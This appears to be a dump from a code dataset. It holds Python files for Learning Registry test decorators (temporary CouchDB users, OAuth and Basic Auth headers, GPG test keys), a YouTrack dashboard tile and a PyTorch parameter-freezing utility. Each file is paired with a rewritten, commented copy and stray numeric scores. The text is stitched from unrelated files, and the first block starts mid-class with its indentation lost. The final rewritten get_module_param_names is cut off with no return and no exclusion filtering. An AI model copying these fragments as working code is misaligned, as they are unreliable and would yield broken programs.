self.bauth_info_attrib = bauth_info_attrib
self.server = couchdb.Server(config['couchdb.url.dbadmin'])
self.users = self.server[config['couchdb.db.users']]
def __call__(self, fn):
def build_basic_auth_header(name, password):
base64string = base64.encodestring('%s:%s' % (name, password))[:-1]
return {"Authorization": "Basic %s" % base64string}
def create_user(name, password, roles=[]):
user_doc = {
"_id" : "org.couchdb.user:{0}".format(name),
"type" : "user",
"name" : "{0}".format(name),
"roles" : roles,
"password" : password
}
try:
del self.users[user_doc["_id"]]
except:
pass
finally:
_, user_doc["_rev"] = self.users.save(user_doc)
return user_doc
def delete_user(user_doc):
try:
del self.users[user_doc["_id"]]
except:
pass
class BAuthInfo(object):
def __init__(self, header, name, password):
self.header = header
self.username = name
self.password = password
@wraps(fn)
def wrap(cls, *args, **kwargs):
try:
self.bauth_user = getattr(cls, self.bauth_user_attrib)
except:
raise AttributeError("Attribute containing Basic Auth user credentials missing.")
user_doc = create_user(**self.bauth_user)
header = build_basic_auth_header(**self.bauth_user)
setattr(cls, self.bauth_info_attrib, BAuthInfo(header, **self.bauth_user))
try:
return fn(cls, *args, **kwargs)
except Exception as e:
raise e
finally:
delete_user(user_doc)
return wrap
def _backup(prop_list=[]):
backup = {}
for prop in prop_list:
backup[prop] = config["app_conf"][prop]
return backup
def _restore(backup={}):
config["app_conf"].update(backup)
class make_gpg_keys(object):
'''decorator that makes at least 1 gpg key. first key is set at the node key'''
def __init__(self, count=1):
self.count = count
self.gnupghome = tempfile.mkdtemp(prefix="gnupg_", dir=".")
self.gpgbin = "gpg"
self.gpg = gnupg.GPG(gnupghome=self.gnupghome, gpgbinary=self.gpgbin)
self.gpg.encoding = 'utf-8'
self.keys = []
def __call__(self, f):
@wraps(f)
def wrapped(*args, **kw):
for i in range(self.count):
cfg = {
"key_type": "RSA",
"key_length": 1024,
"name_real": "Test Key #%d" % i,
"name_comment": "Test key for %s" % f.__class__.__name__,
"name_email": "<EMAIL>" % i,
"passphrase": "<PASSWORD>"
}
key = self.gpg.gen_key(self.gpg.gen_key_input(**cfg))
assert key is not None, "GPG key not generated"
assert key.fingerprint is not None, "Key missing fingerprint"
cfg.update({
"key": key,
"fingerprint": key.fingerprint,
"key_id": key.fingerprint[-16:],
"locations": ["http://www.example.com/pubkey/%s" % key.fingerprint[-16:] ],
"owner": "%s (%s)" % (cfg["name_real"], cfg["name_email"])
})
self.keys.append(cfg)
kw["pgp_keys"] = self.keys
kw["gnupghome"] = self.gnupghome
kw["gpgbin"] = self.gpgbin
kw["gpg"] = self.gpg
backup_props = [
"lr.publish.signing.privatekeyid",
"lr.publish.signing.passphrase",
"lr.publish.signing.gnupghome",
"lr.publish.signing.gpgbin",
"lr.publish.signing.publickeylocations",
"lr.publish.signing.signer"
]
backup_conf = _backup(backup_props)
config["app_conf"].update({
"lr.publish.signing.privatekeyid": self.keys[0]["key_id"],
"lr.publish.signing.passphrase": self.keys[0]["passphrase"],
"lr.publish.signing.gnupghome": self.gnupghome,
"lr.publish.signing.gpgbin": self.gpgbin,
"lr.publish.signing.publickeylocations": '''["http://localhost/pubkey"]''',
"lr.publish.signing.signer": self.keys[0]["owner"]
})
reloadGPGConfig(config["app_conf"])
try:
return f(*args, **kw)
finally:
shutil.rmtree(self.gnupghome)
_restore(backup_conf)
reloadGPGConfig(config["app_conf"])
return wrapped | LR/lr/util/decorators.py | from contextlib import closing
from functools import wraps
from ijson.parse import items
from lr.lib.signing import reloadGPGConfig
from pylons import config
from uuid import uuid1
from LRSignature.sign.Sign import Sign_0_21
import base64
import copy
import couchdb
import gnupg
import ijson
import json
import logging
import os
import shutil
import tempfile
import time
import urllib, urlparse, oauth2, socket, uuid
import urllib2
log = logging.getLogger(__name__)
class SetFlowControl(object):
    """Decorator: temporarily apply flow-control settings to a service doc.

    Saves the doc's ``service_data``, writes the requested flow-control
    options for the duration of the wrapped call, and restores the original
    settings afterwards (even if the call raises — see the try/finally).
    """
    def __init__(self,enabled,serviceDoc,doc_limit=100,id_limit=100):
        # serviceDoc is the _id of the service document in the node DB.
        server = couchdb.Server(config['couchdb.url.dbadmin'])
        self.nodeDb = server[config['couchdb.db.node']]
        self.enabled = enabled
        self.serviceDoc = serviceDoc
        self.doc_limit=doc_limit
        self.id_limit=id_limit
    def __call__(self,f):
        @wraps(f)
        def set_flow_control(obj, *args, **kw):
            serviceDoc = self.nodeDb[self.serviceDoc]
            # Deep copy so the restore below is unaffected by the mutations.
            service_data = copy.deepcopy(serviceDoc['service_data'])
            serviceDoc['service_data']['flow_control'] = self.enabled
            serviceDoc['service_data']['doc_limit'] = self.doc_limit
            serviceDoc['service_data']['id_limit'] = self.id_limit
            self.nodeDb[self.serviceDoc] = serviceDoc
            try:
                return f(obj, *args, **kw)
            finally:
                # Put the original settings back no matter what happened.
                serviceDoc['service_data'] = service_data
                self.nodeDb[self.serviceDoc] = serviceDoc
        return set_flow_control
class ModifiedServiceDoc(object):
    """Decorator: swap in a modified copy of a service doc around a call.

    ``update``, when given, receives a deep copy of the current service doc
    and returns the version to store.  After the wrapped call the original
    doc is written back, refreshed with the latest _rev so CouchDB does not
    reject the restore as a conflict.
    """
    def __init__(self, service_doc_id, update=None):
        server = couchdb.Server(config['couchdb.url.dbadmin'])
        self.nodeDb = server[config['couchdb.db.node']]
        self.service_doc_id = service_doc_id
        self.update_fn = update
    def __call__(self,f):
        @wraps(f)
        def wrapped(*args, **kw):
            orig_serviceDoc = self.nodeDb[self.service_doc_id]
            copy_serviceDoc = copy.deepcopy(orig_serviceDoc)
            if self.update_fn:
                copy_serviceDoc =self.update_fn(copy_serviceDoc)
            self.nodeDb[self.service_doc_id] = copy_serviceDoc
            try:
                return f(*args, **kw)
            finally:
                # Pick up the current _rev before restoring the original.
                orig_serviceDoc["_rev"] = self.nodeDb[self.service_doc_id]["_rev"]
                self.nodeDb[self.service_doc_id] = orig_serviceDoc
        return wrapped
def update_authz(basicauth=False, oauth=False):
    """Return an updater that rewrites a service doc's authorization list.

    The returned function sets ``orig["service_auth"]["service_authz"]`` to
    the enabled mechanisms ("basicauth" and/or "oauth"), or ``["none"]``
    when neither is enabled.  Intended for use with ModifiedServiceDoc.

    Args:
        basicauth: enable the "basicauth" authorization mechanism.
        oauth: enable the "oauth" authorization mechanism.
    """
    def update(orig):
        # Tolerate docs whose service_auth section is missing or null
        # (the previous version raised KeyError when the key was absent).
        orig["service_auth"] = orig.get("service_auth") or { }
        authz = []
        if basicauth:
            authz.append("basicauth")
        if oauth:
            authz.append("oauth")
        if not authz:
            authz.append("none")
        orig["service_auth"]["service_authz"] = authz
        return orig
    return update
def ForceCouchDBIndexing():
    """Decorator factory: force CouchDB view indexing around a test.

    The returned decorator queries every view of every design document in
    the test object's database before and after the wrapped test, so the
    test never races against stale view indexes.
    """
    json_headers = {"Content-Type": "application/json"}
    couch = {
        "url": config["couchdb.url"],
        "resource_data": config["couchdb.db.resourcedata"]
    }
    def indexTestData(obj):
        # The startkey/endkey pair covers exactly the "_design/..." id range.
        opts = {
            "startkey":"_design/",
            "endkey": "_design0",
            "include_docs": True
        }
        design_docs = obj.db.view('_all_docs', **opts)
        for row in design_docs:
            if "views" in row.doc and len(row.doc["views"].keys()) > 0:
                for view in row.doc["views"].keys():
                    # view = row.doc["views"].keys()[0]
                    view_name = "{0}/_view/{1}".format( row.key, view)
                    # Cheapest query that still triggers index building.
                    index_opts = { "limit": 1, "descending": 'true'}
                    if "reduce" in row.doc["views"][view]:
                        index_opts["reduce"] = 'false'
                    # log.debug("Indexing: {0}".format( view_name))
                    req = urllib2.Request("{url}/{resource_data}/{view}?{opts}".format(view=view_name, opts=urllib.urlencode(index_opts), **couch),
                        headers=json_headers)
                    try:
                        res = urllib2.urlopen(req)
                    except Exception, e:
                        # NOTE(review): logs the request object, not the caught
                        # exception `e` — logging e was probably intended.
                        log.info("Problem indexing: %s", req)
                    # view_result = obj.db.view(view_name, **index_opts)
                    # log.error("Indexed: {0}, got back: {1}".format(view_name, json.dumps(res.read())))
            else:
                pass#log.error("Not Indexing: {0}".format( row.key))
    def test_decorator(fn):
        def test_decorated(self, *args, **kw):
            # Index before and after the wrapped test body.
            try:
                #print "Wrapper Before...."
                indexTestData(self)
                return fn(self, *args, **kw)
            except :
                raise
            finally:
                indexTestData(self)
                #print "Wrapper After...."
        return test_decorated
    return test_decorator
def PublishTestDocs(sourceData, prefix, sleep=0, force_index=True):
json_headers = {"Content-Type": "application/json"}
test_data_log = "test-data-%s.log" % prefix
couch = {
"url": config["couchdb.url"],
"resource_data": config["couchdb.db.resourcedata"]
}
@ModifiedServiceDoc(config['lr.publish.docid'], update_authz())
def writeTestData(obj, **kw):
try:
key = kw["pgp_keys"][0]
signer = Sign_0_21(privateKeyID=key["fingerprint"], passphrase=key["passphrase"], gnupgHome=kw["gnupghome"], gpgbin=kw["gpgbin"], publicKeyLocations=key["locations"])
except:
signer = None
if not hasattr(obj, "test_data_ids"):
obj.test_data_ids = {}
obj.test_data_ids[prefix] = []
with open(test_data_log, "w") as plog:
for doc in sourceData:
if "doc_ID" not in doc:
doc["doc_ID"] = prefix+str(uuid1())
try:
doc = signer.sign(doc)
except:
pass
obj.app.post('/publish', params=json.dumps({"documents": [ doc ]}), headers=json_headers)
plog.write(doc["doc_ID"] + os.linesep)
obj.test_data_ids[prefix].append(doc["doc_ID"])
if sleep > 0:
time.sleep(sleep)
kw["test_data_ids"] = obj.test_data_ids[prefix]
return kw
def indexTestData(obj):
if force_index == False:
return
opts = {
"startkey":"_design/",
"endkey": "_design0",
"include_docs": True
}
design_docs = obj.db.view('_all_docs', **opts)
for row in design_docs:
if "views" in row.doc and len(row.doc["views"].keys()) > 0:
for view in row.doc["views"].keys():
# view = row.doc["views"].keys()[0]
view_name = "{0}/_view/{1}".format( row.key, view)
index_opts = { "limit": 1, "descending": 'true'}
if "reduce" in row.doc["views"][view]:
index_opts["reduce"] = 'false'
# log.error("Indexing: {0}".format( view_name))
req = urllib2.Request("{url}/{resource_data}/{view}?{opts}".format(view=view_name, opts=urllib.urlencode(index_opts), **couch),
headers=json_headers)
try:
res = urllib2.urlopen(req)
except Exception, e:
log.info("Problem forcing index: %s", e)
# view_result = obj.db.view(view_name, **index_opts)
# log.error("Indexed: {0}, got back: {1}".format(view_name, json.dumps(res.read())))
else:
pass# log.error("Not Indexing: {0}".format( row.key))
def cacheTestData(obj, **kw):
req = urllib2.Request("{url}/{resource_data}/_all_docs?include_docs=true".format(**couch),
data=json.dumps({"keys":obj.test_data_ids[prefix]}),
headers=json_headers)
res = urllib2.urlopen(req)
docs = list(items(res, 'rows.item.doc'))
if not hasattr(obj, "test_data_sorted"):
obj.test_data_sorted = {}
def sortkey(k):
try:
return k['node_timestamp']
except:
return k['create_timestamp']
obj.test_data_sorted[prefix] = sorted(docs, key=lambda k: sortkey(k))
kw["test_data_sorted"] = obj.test_data_sorted[prefix]
return kw
def removeTestData(obj):
for doc_id in obj.test_data_ids[prefix]:
try:
del obj.db[doc_id]
except Exception as e:
print e.message
try:
del obj.db[doc_id+"-distributable"]
except Exception as e:
print e.message
try:
del obj.test_data_ids[prefix]
except Exception as e:
print e.message
try:
del obj.test_data_ids[prefix]
except Exception as e:
print e.message
def test_decorator(fn):
def test_decorated(self, *args, **kw):
try:
#print "Wrapper Before...."
kw = writeTestData(self, **kw)
indexTestData(self)
kw = cacheTestData(self, **kw)
return fn(self, *args, **kw)
except :
raise
finally:
removeTestData(self)
indexTestData(self)
#print "Wrapper After...."
return test_decorated
return test_decorator
def getExtraEnvironment(base_url=None):
    """Derive extra WSGI environ entries from a base URL.

    Splits ``base_url`` into scheme / host / port / path and returns the
    corresponding ``wsgi.url_scheme``, ``SERVER_NAME``, ``SERVER_PORT``,
    ``HTTP_HOST`` and ``SCRIPT_NAME`` entries.  Returns an empty dict for a
    falsy URL; raises ValueError for a URL carrying a query/fragment or an
    unknown scheme without an explicit port.
    """
    if not base_url:
        return {}
    scheme, netloc, path, query, fragment = urlparse.urlsplit(base_url)
    if query or fragment:
        raise ValueError(
            "base_url (%r) cannot have a query or fragment"
            % base_url)
    environ = {}
    if scheme:
        environ['wsgi.url_scheme'] = scheme
    if netloc:
        # Supply the default port when the URL did not specify one.
        if ':' not in netloc:
            if scheme == 'http':
                netloc += ':80'
            elif scheme == 'https':
                netloc += ':443'
            else:
                raise ValueError(
                    "Unknown scheme: %r" % scheme)
        host, port = netloc.split(':', 1)
        environ['SERVER_PORT'] = port
        environ['SERVER_NAME'] = host
        environ['HTTP_HOST'] = netloc
    if path:
        environ['SCRIPT_NAME'] = urllib.unquote(path)
    return environ
class OAuthRequest(object):
    """Decorator: sign a request with OAuth for a temporary CouchDB user.

    Reads the OAuth user document from the attribute named
    ``oauth_user_attrib`` on the decorated test's class, creates that user
    in CouchDB for the duration of the test, and exposes the signed request
    material (consumer, token, Authorization header, WSGI environ, path)
    under ``oauth_info_attrib``.  Both the info attribute and the CouchDB
    user are removed in a finally block.
    """
    def __init__(self, path, http_method="GET", url_base="http://www.example.com", oauth_user_attrib="oauth_user", oauth_info_attrib="oauth" ):
        self.oauth_user_attrib = oauth_user_attrib
        self.oauth_info_attrib = oauth_info_attrib
        self.http_method = http_method
        self.url_base = url_base
        self.path = path
        self.server = couchdb.Server(config['couchdb.url.dbadmin'])
        self.users = self.server[config['couchdb.db.users']]
    def __call__(self, fn):
        def create_user(oauth_user):
            # Drop any stale copy of the user first, then (re)create it.
            try:
                del self.users[oauth_user["_id"]]
            except:
                pass
            finally:
                # NOTE(review): leftover debug print of the full user doc
                # (includes secrets); consider removing or using `log`.
                print oauth_user
                self.users.save(oauth_user)
        def remove_user(oauth_user):
            try:
                del self.users[oauth_user["_id"]]
            except:
                pass
        @wraps(fn)
        def test_decorator(cls, *args, **kwargs):
            if (hasattr(cls, self.oauth_user_attrib)):
                self.oauth_user = getattr(cls, self.oauth_user_attrib)
            else:
                err = AttributeError()
                err.message = "Missing attribute '%s' which should be data for CouchDB OAuth User" % self.oauth_user_attrib
                raise err
            # Build consumer/token from the user doc's oauth section and
            # sign a request for the configured method/URL.
            consumer = oauth2.Consumer(key=self.oauth_user["name"], secret=self.oauth_user["oauth"]["consumer_keys"][self.oauth_user["name"]])
            token = oauth2.Token(key="node_sign_token", secret=self.oauth_user["oauth"]["tokens"]["node_sign_token"])
            params = {
                "oauth_signature_method": "HMAC-SHA1",
            }
            req = oauth2.Request.from_consumer_and_token(consumer, token, http_method=self.http_method, http_url="{0}{1}".format(self.url_base, self.path), parameters=params)
            # Sign the request.
            signature_method = oauth2.SignatureMethod_HMAC_SHA1()
            req.sign_request(signature_method, consumer, token)
            header = req.to_header()
            # Coerce a possibly-unicode header value to a plain str.
            header["Authorization"] = str(header["Authorization"])
            extraEnv = getExtraEnvironment(self.url_base)
            class OauthInfo(object):
                # Plain record of everything a test needs to replay the
                # signed request.
                def __init__(self, consumer, token, request, header, extraEnv, path):
                    self.consumer = consumer
                    self.token = token
                    self.request = request
                    self.header = header
                    self.env = extraEnv
                    self.path = path
            setattr(cls, self.oauth_info_attrib, OauthInfo(consumer, token, req, header, extraEnv, self.path))
            try:
                create_user(self.oauth_user)
                result = fn(cls, *args, **kwargs)
                return result
            finally:
                # Always detach the info object and delete the CouchDB user.
                delattr(cls, self.oauth_info_attrib)
                remove_user(self.oauth_user)
        return test_decorator
class BasicAuthRequest(object):
    """Decorator: provision a CouchDB user and inject Basic Auth info.

    Reads credentials (name/password) from the attribute named
    ``bauth_user_attrib`` on the decorated test's class, creates a matching
    CouchDB user for the duration of the test, and exposes an info object
    (header, username, password) under ``bauth_info_attrib``.  The user is
    deleted again in a finally block.
    """
    def __init__(self, bauth_user_attrib="bauth_user", bauth_info_attrib="bauth" ):
        self.bauth_user_attrib = bauth_user_attrib
        self.bauth_info_attrib = bauth_info_attrib
        self.server = couchdb.Server(config['couchdb.url.dbadmin'])
        self.users = self.server[config['couchdb.db.users']]
    def __call__(self, fn):
        def build_basic_auth_header(name, password):
            # encodestring appends a trailing newline; strip it off.
            base64string = base64.encodestring('%s:%s' % (name, password))[:-1]
            return {"Authorization": "Basic %s" % base64string}
        def create_user(name, password, roles=None):
            # roles defaults to None instead of a shared mutable [] default.
            user_doc = {
                "_id" : "org.couchdb.user:{0}".format(name),
                "type" : "user",
                "name" : "{0}".format(name),
                "roles" : roles if roles is not None else [],
                "password" : password
            }
            try:
                # Remove any stale user left over from a previous run.
                del self.users[user_doc["_id"]]
            except:
                pass
            finally:
                _, user_doc["_rev"] = self.users.save(user_doc)
            return user_doc
        def delete_user(user_doc):
            try:
                del self.users[user_doc["_id"]]
            except:
                pass
        class BAuthInfo(object):
            # Plain record handed to the test via bauth_info_attrib.
            def __init__(self, header, name, password):
                self.header = header
                self.username = name
                self.password = password
        @wraps(fn)
        def wrap(cls, *args, **kwargs):
            try:
                self.bauth_user = getattr(cls, self.bauth_user_attrib)
            except:
                raise AttributeError("Attribute containing Basic Auth user credentials missing.")
            user_doc = create_user(**self.bauth_user)
            header = build_basic_auth_header(**self.bauth_user)
            setattr(cls, self.bauth_info_attrib, BAuthInfo(header, **self.bauth_user))
            try:
                # (The previous `except Exception as e: raise e` only
                # discarded the original traceback; finally still runs.)
                return fn(cls, *args, **kwargs)
            finally:
                delete_user(user_doc)
        return wrap
def _backup(prop_list=None):
    """Snapshot the named app_conf properties for a later _restore.

    Args:
        prop_list: iterable of ``config["app_conf"]`` keys to save
            (default: save nothing).

    Returns:
        dict mapping each requested key to its current value.
    """
    # None default avoids the shared mutable-default-argument pitfall.
    return {prop: config["app_conf"][prop] for prop in (prop_list or [])}
def _restore(backup={}):
    # Reverse of _backup: merge the saved values back into app_conf.
    # The mutable default is harmless here because `backup` is only read.
    config["app_conf"].update(backup)
class make_gpg_keys(object):
    '''decorator that makes at least 1 gpg key. first key is set at the node key'''
    def __init__(self, count=1):
        # count: number of RSA test keys to generate per wrapped call.
        self.count = count
        # Keys live in a throw-away GNUPGHOME under the cwd; it is removed
        # in wrapped()'s finally block.
        self.gnupghome = tempfile.mkdtemp(prefix="gnupg_", dir=".")
        self.gpgbin = "gpg"
        self.gpg = gnupg.GPG(gnupghome=self.gnupghome, gpgbinary=self.gpgbin)
        self.gpg.encoding = 'utf-8'
        self.keys = []
    def __call__(self, f):
        @wraps(f)
        def wrapped(*args, **kw):
            for i in range(self.count):
                # NOTE(review): "<EMAIL>" / "<PASSWORD>" look like redacted
                # placeholders; gen_key_input needs real values here.
                cfg = {
                    "key_type": "RSA",
                    "key_length": 1024,
                    "name_real": "Test Key #%d" % i,
                    # NOTE(review): f.__class__.__name__ is 'function' for a
                    # plain function; f.__name__ was probably intended.
                    "name_comment": "Test key for %s" % f.__class__.__name__,
                    "name_email": "<EMAIL>" % i,
                    "passphrase": "<PASSWORD>"
                }
                key = self.gpg.gen_key(self.gpg.gen_key_input(**cfg))
                assert key is not None, "GPG key not generated"
                assert key.fingerprint is not None, "Key missing fingerprint"
                # Keep the generated key handle plus derived metadata.
                cfg.update({
                    "key": key,
                    "fingerprint": key.fingerprint,
                    "key_id": key.fingerprint[-16:],
                    "locations": ["http://www.example.com/pubkey/%s" % key.fingerprint[-16:] ],
                    "owner": "%s (%s)" % (cfg["name_real"], cfg["name_email"])
                })
                self.keys.append(cfg)
            # Expose the generated key material to the wrapped test.
            kw["pgp_keys"] = self.keys
            kw["gnupghome"] = self.gnupghome
            kw["gpgbin"] = self.gpgbin
            kw["gpg"] = self.gpg
            # Swap the node's signing config to the first generated key,
            # restoring (and reloading) the original config afterwards.
            backup_props = [
                "lr.publish.signing.privatekeyid",
                "lr.publish.signing.passphrase",
                "lr.publish.signing.gnupghome",
                "lr.publish.signing.gpgbin",
                "lr.publish.signing.publickeylocations",
                "lr.publish.signing.signer"
            ]
            backup_conf = _backup(backup_props)
            config["app_conf"].update({
                "lr.publish.signing.privatekeyid": self.keys[0]["key_id"],
                "lr.publish.signing.passphrase": self.keys[0]["passphrase"],
                "lr.publish.signing.gnupghome": self.gnupghome,
                "lr.publish.signing.gpgbin": self.gpgbin,
                "lr.publish.signing.publickeylocations": '''["http://localhost/pubkey"]''',
                "lr.publish.signing.signer": self.keys[0]["owner"]
            })
            reloadGPGConfig(config["app_conf"])
            try:
                return f(*args, **kw)
            finally:
                shutil.rmtree(self.gnupghome)
                _restore(backup_conf)
                reloadGPGConfig(config["app_conf"])
        return wrapped
import com.xhaus.jyson.JysonCodec as json
import sys
import time
import traceback
from yt.Server import YtClient
import org.slf4j.Logger as Logger
import org.slf4j.LoggerFactory as LoggerFactory
logger = LoggerFactory.getLogger("com.xebialabs.QueryTile")
logger.debug("START")
if not server:
logger.debug("YouTrack server ID must be provided")
raise Exception("YouTrack server ID must be provided")
yt = YtClient(server, username, password)
data = None
status = None
def get_row_data(item):
row_map = {}
for column in detailsViewColumns:
try:
logger.error("for column = %s" % column)
logger.error("row_map[%s] = %s" % (column, item[column]))
row_map[column] = item[column]
except:
logger.error("column %s is bad" % column)
row_map['link'] = "%s/issue/%s" % (server['url'], item['id'])
row_map['Assignee'] = item['Assignee']
row_map['State'] = item['State']
row_map['id'] = item['id']
return row_map
logger.debug("getIssuesByQuery - %s" % (query))
results = yt.getIssuesByQuery(query)
logger.debug("results = %s" % results)
rows= []
logger.debug("START LOOP")
number = 0
assignee = {}
state = {}
people = []
for item in results:
logger.error("record = %s" % item)
row = item['id']
rec = {}
for key in item:
rec[key] = item[key]
if item['Assignee'] not in people:
people.append(item['Assignee'])
if item['Assignee'] in assignee.keys():
assignee[item['Assignee']] += 1
else:
assignee[item['Assignee']] = 1
if item['State'] in state.keys():
state[item['State']] += 1
else:
state[item['State']] = 1
rows.append( get_row_data(rec) )
logger.error("END LOOP")
logger.error( json.dumps(rows, indent=4, sort_keys=True) )
#logger.error( "detailsViewColumns %s" + json.dumps(detailsViewColumns, indent=4, sort_keys=True) )
data = {
'tickets': rows,
'assignee': [{"name":key,"value":assignee[key]} for key in assignee.keys()],
'people': people,
'state': [{"name":key,"value":state[key]} for key in state.keys()],
'detailsViewColumns': detailsViewColumns
} | src/main/resources/yt/QueryTile.py |
import com.xhaus.jyson.JysonCodec as json
import sys
import time
import traceback
from yt.Server import YtClient
import org.slf4j.Logger as Logger
import org.slf4j.LoggerFactory as LoggerFactory
logger = LoggerFactory.getLogger("com.xebialabs.QueryTile")
logger.debug("START")
if not server:
logger.debug("YouTrack server ID must be provided")
raise Exception("YouTrack server ID must be provided")
yt = YtClient(server, username, password)
data = None
status = None
def get_row_data(item):
    """Project a YouTrack issue dict onto the configured detail columns.

    Builds a flat map of column -> value for every column in
    detailsViewColumns (columns missing from the issue are logged and
    skipped), then always adds the issue link, Assignee, State and id.
    """
    row_map = {}
    for column in detailsViewColumns:
        try:
            # Per-column tracing belongs at debug level, not error.
            logger.debug("for column = %s" % column)
            logger.debug("row_map[%s] = %s" % (column, item[column]))
            row_map[column] = item[column]
        except:
            # Column not present on this issue; best effort, skip it.
            logger.error("column %s is bad" % column)
    row_map['link'] = "%s/issue/%s" % (server['url'], item['id'])
    row_map['Assignee'] = item['Assignee']
    row_map['State'] = item['State']
    row_map['id'] = item['id']
    return row_map
# Run the configured query against YouTrack and aggregate the results.
logger.debug("getIssuesByQuery - %s" % (query))
results = yt.getIssuesByQuery(query)
logger.debug("results = %s" % results)
rows= []
logger.debug("START LOOP")
# NOTE(review): `number` is assigned but never used below.
number = 0
assignee = {}  # assignee name -> issue count
state = {}     # state name -> issue count
people = []    # distinct assignees, in first-seen order
for item in results:
    logger.error("record = %s" % item)
    # NOTE(review): `row` is assigned but never used.
    row = item['id']
    # Shallow-copy the issue before handing it to get_row_data.
    rec = {}
    for key in item:
        rec[key] = item[key]
    if item['Assignee'] not in people:
        people.append(item['Assignee'])
    # Tally issues per assignee and per state.
    if item['Assignee'] in assignee.keys():
        assignee[item['Assignee']] += 1
    else:
        assignee[item['Assignee']] = 1
    if item['State'] in state.keys():
        state[item['State']] += 1
    else:
        state[item['State']] = 1
    rows.append( get_row_data(rec) )
logger.error("END LOOP")
logger.error( json.dumps(rows, indent=4, sort_keys=True) )
#logger.error( "detailsViewColumns %s" + json.dumps(detailsViewColumns, indent=4, sort_keys=True) )
# Payload consumed by the dashboard tile.
data = {
    'tickets': rows,
    'assignee': [{"name":key,"value":assignee[key]} for key in assignee.keys()],
    'people': people,
    'state': [{"name":key,"value":state[key]} for key in state.keys()],
    'detailsViewColumns': detailsViewColumns
} | 0.129954 | 0.090776 |
"""Contains the class for fixing parameters."""
__all__ = ['Freezer']
class Freezer(object):
"""Defines the freezer.
`Freeze` means to fix some certain parameters such that they cannot get
updated during training. To save time, in this implementation, frozen is
achieved by directly converting those parameters to buffers.
"""
@staticmethod
def param_to_buffer(module, name):
"""Converts the parameter in `module` to a buffer with the same `name`.
Args:
module: `nn.Module`, the root module to start the params searching.
name: `str`, the name of parameters, where names of sub-modules are
joined by `.` (e.g., 'synthesis.layer5.style.weight').
"""
split_name = name.split('.')
module_name_hierarchy = split_name[:-1]
param_name = split_name[-1]
tgt_module = module
for module_name in module_name_hierarchy:
tgt_module = getattr(tgt_module, module_name)
param_data = getattr(tgt_module, param_name).data
delattr(tgt_module, param_name)
tgt_module.register_buffer(name=param_name, tensor=param_data)
@staticmethod
def freeze_by_keywords(module, keywords=None, exclusive_keywords=None):
"""Freezes parameters that matched by the given keywords.
Args:
module: `nn.Module`, the root module to start the params searching.
keywords: `str`, the keys to match target parameters. Multiple keys
can be provided with comma as the separator. If set to `*`,
the entire `module` will be frozen. If set to `None`, nothing
will be frozen. (default: None)
exclusive_keywords: `str`, the keywords to be excluded for target
parameters. Multiple keys can be provided with comma as the
separator. If set to `None`, this method will check all
parameters inside the module. (default: None)
Examples:
>>> # Freeze the mapping network of StyleGAN2:
>>> Freezer.freeze_by_keywords(StyleGAN2Generator, 'mapping')
>>> # Another implementation:
>>> Freezer.freeze_by_keywords(StyleGAN2Generator, '*',
exclusive_keywords='synthesis')
>>> # Freeze the mapping network and affine layers of StyleGAN2:
>>> Freezer.freeze_by_keywords(StyleGAN2Generator, 'mapping, style')
"""
if not keywords: # Shortcut of freezing nothing.
return
# Get parameter name list.
param_list = Freezer.get_module_param_names(module, exclusive_keywords)
if keywords == '*': # Shortcut of freezing everything.
for name in param_list:
Freezer.param_to_buffer(module, name)
return
# Freeze parameters that contains any keyword.
keywords = keywords.replace(' ', '').split(',')
for name in param_list:
if any(keyword in name for keyword in keywords):
Freezer.param_to_buffer(module, name)
@staticmethod
def get_module_param_names(module, exclusive_keywords=None):
"""Gets all parameter names not containing any of exclusive keywords.
Args:
module: `nn.Module`, the root module to start the params searching.
exclusive_keywords: `str`, the words to be excluded for target
parameters. Multiple keys can be provided with comma as the
separator. If set to `None`, this method returns all parameter
names inside the module. (default: None)
Returns:
A list of parameter names filtered out by `exclusive_keywords`.
Examples:
>>> # Get all parameters of StyleGAN discriminator except the task
>>> # head.
>>> param_names = Freezer.get_module_param_names(
StyleGANDiscriminator, exclusive_keywords='output')
"""
if not exclusive_keywords: # Shortcut without filtering.
return [name for name, _ in module.named_parameters()]
# Filter parameters by name.
exclusive_keywords = exclusive_keywords.replace(' ', '').split(',')
return [name for name, _ in module.named_parameters()
if all(key not in name for key in exclusive_keywords)] | runners/utils/freezer.py | """Contains the class for fixing parameters."""
__all__ = ['Freezer']
class Freezer(object):
    """Utility for fixing (freezing) parameters of a module.

    Freezing a parameter means it can no longer receive gradient updates
    during training.  Instead of toggling ``requires_grad``, this
    implementation simply re-registers the parameter's tensor as a buffer,
    which removes it from ``named_parameters()`` altogether.
    """

    @staticmethod
    def param_to_buffer(module, name):
        """Re-registers the parameter ``name`` of ``module`` as a buffer.

        Args:
            module: `nn.Module` owning the parameter (possibly through
                sub-modules).
            name: `str`, dotted path of the parameter relative to `module`
                (e.g., 'synthesis.layer5.style.weight').
        """
        *parent_names, leaf_name = name.split('.')
        target = module
        for part in parent_names:
            target = getattr(target, part)
        tensor = getattr(target, leaf_name).data
        delattr(target, leaf_name)
        target.register_buffer(name=leaf_name, tensor=tensor)

    @staticmethod
    def freeze_by_keywords(module, keywords=None, exclusive_keywords=None):
        """Freezes every parameter whose name matches any given keyword.

        Args:
            module: `nn.Module` whose parameters are candidates.
            keywords: `str`, comma-separated keywords selecting parameters
                to freeze. `'*'` freezes all candidates; `None` freezes
                nothing. (default: None)
            exclusive_keywords: `str`, comma-separated keywords; parameters
                whose names contain any of them are never touched.
                (default: None)

        Examples:

        >>> # Freeze the mapping network of StyleGAN2:
        >>> Freezer.freeze_by_keywords(StyleGAN2Generator, 'mapping')
        >>> # Another implementation:
        >>> Freezer.freeze_by_keywords(StyleGAN2Generator, '*',
                exclusive_keywords='synthesis')
        >>> # Freeze the mapping network and affine layers of StyleGAN2:
        >>> Freezer.freeze_by_keywords(StyleGAN2Generator, 'mapping, style')
        """
        if not keywords:  # Nothing requested.
            return
        candidates = Freezer.get_module_param_names(module, exclusive_keywords)
        if keywords == '*':  # Freeze every remaining candidate.
            selected = candidates
        else:
            wanted = keywords.replace(' ', '').split(',')
            selected = [n for n in candidates
                        if any(w in n for w in wanted)]
        for param_name in selected:
            Freezer.param_to_buffer(module, param_name)

    @staticmethod
    def get_module_param_names(module, exclusive_keywords=None):
        """Collects parameter names, dropping those matching exclusions.

        Args:
            module: `nn.Module` to inspect.
            exclusive_keywords: `str`, comma-separated keywords; any
                parameter whose name contains one of them is omitted.
                `None` keeps everything. (default: None)

        Returns:
            A list of (dotted) parameter names.

        Examples:

        >>> # Get all parameters of StyleGAN discriminator except the task
        >>> # head.
        >>> param_names = Freezer.get_module_param_names(
                StyleGANDiscriminator, exclusive_keywords='output')
        """
        names = (n for n, _ in module.named_parameters())
